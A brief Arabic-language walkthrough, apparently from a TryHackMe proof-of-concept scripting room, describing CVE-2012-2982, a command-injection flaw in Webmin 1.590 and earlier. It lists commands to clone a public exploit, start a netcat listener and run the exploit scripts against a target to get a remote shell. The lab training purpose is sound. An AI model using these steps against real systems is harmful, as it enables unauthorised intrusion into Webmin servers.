
ممارسة كتابة نصوص POC في غرفة intro poc scripting من Tryhackme (لنظام Linux)
يسمح ملف file/show.cgi في Webmin 1.590 والإصدارات الأقدم للمستخدمين الموثوقين عن بعد بتنفيذ أوامر تعسفية عبر حرف غير صالح في اسم المسار، كما هو موضح باستخدام الحرف | (pipe).
git clone https://github.com/CpyRe/CVE-2012-2982.gitpip3 install -r requirements.txtnc -nlvp <port>python3 exp.py <myip> <vulnip> <port>
أو
python3 subprocess-exp.py <myip> <vulnip> <port>